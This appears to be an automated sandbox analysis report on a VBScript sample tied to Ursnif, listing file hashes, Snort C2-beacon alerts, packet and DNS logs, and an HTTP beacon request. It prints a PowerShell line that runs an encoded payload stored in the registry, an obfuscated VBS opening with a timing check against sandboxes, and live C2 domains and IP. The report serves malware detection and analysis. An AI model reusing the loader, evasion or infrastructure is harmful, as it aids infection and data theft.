                                                    Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.0.cs"......
                                                    C:\Users\user\Documents\20210910\PowerShell_transcript.767668.YlCTH0VE.20210910070227.txt
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1189
                                                    Entropy (8bit):5.316207189770612
                                                    Encrypted:false
                                                    SSDEEP:24:BxSAqixvBnRWzx2DOXUWOLCHGIYBtBCWptHjeTKKjX4CIym1ZJXFOLCHGIYBtBjf:BZqevhUzoORFeVfqDYB1Z9FeNZZ5
                                                    MD5:04943686EDE108574C2C9FF3F9C199C5
                                                    SHA1:77587BAADB592CF5228FA2D939F1A55E762152BC
                                                    SHA-256:5FB3855BE26450340440903D2BEF71652EFAD956D36B623B8B6DCB8AAF897757
                                                    SHA-512:4DA982F49DC69997A79906A99418CDED43A1428AE37CE27F8E1264E40AAD73655AB6E0C75EA56F089E82B0CF57FA55B7C32654C75877889550AE661ABF1A5179
                                                    Malicious:false
                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210910070227..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 767668 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 4216..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210910070227..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..**********************..

                                                    Static File Info

                                                    General

                                                    File type:ASCII text, with very long lines, with CRLF line terminators
                                                    Entropy (8bit):4.859322582752409
                                                    TrID:
                                                      File name:start[526268].vbs
                                                      File size:1402115
                                                      MD5:b0de0a696f7b17724fef5c5e0af2bd1d
                                                      SHA1:3de72b8cae6a84f82e05cae18f48a1a302dbebc3
                                                      SHA256:e3a1fb3e932aae628aa08bde31be3b30861fa90ca16db4f81d7989093e1fddbe
                                                      SHA512:d04a7ac14bcb8b3310c009ebada2d0ee230fa64b92a48328c0a651391a2d37e1354123f96b9a463ef3ec9d140aa32e2a8d047d9baadaf5c563f6aaa23b084353
                                                      SSDEEP:12288:SfCepvwq9BTH3FEN9cy59WSpU9lAR4lYtE9E5rf99bM:ipvp9BT1U9cyjUAvmEZbM
                                                      File Content Preview:IHGsfsedgfssd = Timer()..For hjdHJGASDF = 1 to 7..WScript.Sleep 1000:..Next..frjekgJHKasd = Timer()..if frjekgJHKasd - IHGsfsedgfssd < 5 Then..Do: KJHSGDflkjsd = 4: Loop..End if ..const VSE = 208..const Aeq = 94..pgoTH = Array(UGM,DP,wy,2,yt,2,2,2,vy,2,2,

                                                      File Icon

                                                      Icon Hash:e8d69ece869a9ec4

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                      09/10/21-07:02:17.572803 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49790 | 80 | 192.168.2.3 | 185.251.90.253
                                                      09/10/21-07:02:17.572803 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49790 | 80 | 192.168.2.3 | 185.251.90.253
                                                      09/10/21-07:02:18.547163 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49791 | 80 | 192.168.2.3 | 185.251.90.253
                                                      09/10/21-07:02:18.547163 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49791 | 80 | 192.168.2.3 | 185.251.90.253
                                                      09/10/21-07:02:19.594026 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49792 | 80 | 192.168.2.3 | 185.251.90.253
                                                      09/10/21-07:02:44.225999 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49793 | 80 | 192.168.2.3 | 185.251.90.253
                                                      09/10/21-07:02:44.225999 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49793 | 80 | 192.168.2.3 | 185.251.90.253

                                                      Network Port Distribution

                                                      TCP Packets

                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Sep 10, 2021 07:02:19.065051079 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.065052986 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.065104961 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.065143108 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.065150023 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.065196991 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.065249920 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.065314054 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.065334082 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.065373898 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.065423965 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.065526962 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.114464045 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114520073 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114559889 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114595890 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114634991 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114672899 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114720106 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114764929 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114801884 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114819050 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.114840984 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114880085 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114887953 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.114917040 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114953995 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114984989 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.114990950 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.114998102 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.115040064 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115082979 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115084887 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.115163088 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115179062 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.115222931 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115267038 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115304947 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115317106 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.115343094 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115370989 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.115382910 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115421057 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115463018 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.115468025 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115510941 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115549088 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115567923 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.115587950 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115636110 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.115679979 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115720987 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115770102 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115776062 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.115813971 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115865946 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115919113 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.115941048 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.115958929 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.115974903 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.116030931 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.116086006 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.116125107 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.116133928 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.116194963 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.116198063 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.116255999 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.116302013 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.116312981 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.116410971 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.165759087 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.165836096 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.165893078 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.165946960 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.165968895 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.166001081 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166044950 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.166054964 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166114092 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166131973 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.166155100 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166207075 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166239023 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.166248083 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166285992 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166317940 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.166325092 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166363001 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166405916 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.166412115 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166455030 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166492939 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166496038 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.166532993 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166570902 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166584015 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.166608095 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166641951 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.166646004 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166682959 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166727066 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.166731119 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166774988 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166811943 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166831970 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.166851044 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166888952 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166896105 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.166924953 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166964054 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.166980028 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167002916 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167037964 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167051077 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167093992 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167160988 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167181969 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167223930 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167259932 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167262077 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167300940 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167336941 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167368889 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167376041 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167419910 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167437077 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167510033 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167531967 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167572975 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167610884 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167654991 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167699099 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167714119 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167757988 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167781115 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167815924 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167859077 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167860031 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167897940 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167937040 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.167953014 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.167975903 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.168013096 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.211937904 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.216938972 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.216978073 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217015028 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217062950 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217107058 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217144012 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217183113 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217205048 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217221022 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217242002 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217257977 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217297077 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217329025 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217334986 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217371941 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217384100 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217427969 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217464924 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217490911 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217503071 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217541933 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217561007 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217578888 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217617989 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217658043 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217664003 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217717886 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217727900 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217775106 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217812061 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217830896 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217849970 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217880964 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217889071 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217926025 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217962980 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.217967987 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.217998981 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218045950 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218080044 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218091011 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218128920 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218154907 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218168020 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218205929 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218223095 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218241930 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218280077 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218302011 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218317986 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218367100 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218370914 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218410015 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218446970 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218478918 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218485117 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218523979 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218550920 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218559980 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218597889 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218635082 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218641043 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218682051 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218724012 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218724966 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218764067 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218785048 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.218802929 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.218861103 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.258869886 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.261038065 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.261089087 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.261251926 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.267929077 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.267976046 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268013954 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268053055 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268090963 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268106937 CEST4979180192.168.2.3185.251.90.253
                                                      Sep 10, 2021 07:02:19.268138885 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268182993 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268218994 CEST8049791185.251.90.253192.168.2.3
                                                      Sep 10, 2021 07:02:19.268239021 CEST4979180192.168.2.3185.251.90.253

                                                      UDP Packets


DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Sep 10, 2021 07:02:17.167288065 CEST | 192.168.2.3 | 8.8.8.8 | 0xeeb0 | Standard query (0) | atl.bigbigpoppa.com | A (IP address) | IN (0x0001) |
| Sep 10, 2021 07:02:18.455923080 CEST | 192.168.2.3 | 8.8.8.8 | 0xf9e9 | Standard query (0) | atl.bigbigpoppa.com | A (IP address) | IN (0x0001) |
| Sep 10, 2021 07:02:19.504143000 CEST | 192.168.2.3 | 8.8.8.8 | 0x62ea | Standard query (0) | atl.bigbigpoppa.com | A (IP address) | IN (0x0001) |
| Sep 10, 2021 07:02:43.529391050 CEST | 192.168.2.3 | 8.8.8.8 | 0xd36d | Standard query (0) | resolver1.opendns.com | A (IP address) | IN (0x0001) |
| Sep 10, 2021 07:02:43.832326889 CEST | 192.168.2.3 | 8.8.8.8 | 0xcca7 | Standard query (0) | art.microsoftsofymicrosoftsoft.at | A (IP address) | IN (0x0001) |
| Sep 10, 2021 07:02:44.751022100 CEST | 192.168.2.3 | 8.8.8.8 | 0x2a20 | Standard query (0) | art.microsoftsofymicrosoftsoft.at | A (IP address) | IN (0x0001) |

DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Sep 10, 2021 07:02:17.487325907 CEST | 8.8.8.8 | 192.168.2.3 | 0xeeb0 | No error (0) | atl.bigbigpoppa.com | | 185.251.90.253 | A (IP address) | IN (0x0001) |
| Sep 10, 2021 07:02:18.489656925 CEST | 8.8.8.8 | 192.168.2.3 | 0xf9e9 | No error (0) | atl.bigbigpoppa.com | | 185.251.90.253 | A (IP address) | IN (0x0001) |
| Sep 10, 2021 07:02:19.540473938 CEST | 8.8.8.8 | 192.168.2.3 | 0x62ea | No error (0) | atl.bigbigpoppa.com | | 185.251.90.253 | A (IP address) | IN (0x0001) |
| Sep 10, 2021 07:02:43.557179928 CEST | 8.8.8.8 | 192.168.2.3 | 0xd36d | No error (0) | resolver1.opendns.com | | 208.67.222.222 | A (IP address) | IN (0x0001) |
| Sep 10, 2021 07:02:44.172904015 CEST | 8.8.8.8 | 192.168.2.3 | 0xcca7 | No error (0) | art.microsoftsofymicrosoftsoft.at | | 185.251.90.253 | A (IP address) | IN (0x0001) |
| Sep 10, 2021 07:02:45.060425043 CEST | 8.8.8.8 | 192.168.2.3 | 0x2a20 | No error (0) | art.microsoftsofymicrosoftsoft.at | | 185.251.90.253 | A (IP address) | IN (0x0001) |

HTTP Request Dependency Graph

• atl.bigbigpoppa.com
• art.microsoftsofymicrosoftsoft.at

HTTP Packets

Session ID: 0 | Source IP: 192.168.2.3 | Source Port: 49790 | Destination IP: 185.251.90.253 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: Sep 10, 2021 07:02:17.572803020 CEST | kBytes transferred: 5265 | Direction: OUT
GET /NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
Host: atl.bigbigpoppa.com

Timestamp: Sep 10, 2021 07:02:18.024907112 CEST | kBytes transferred: 5267 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Sep 2021 05:02:17 GMT
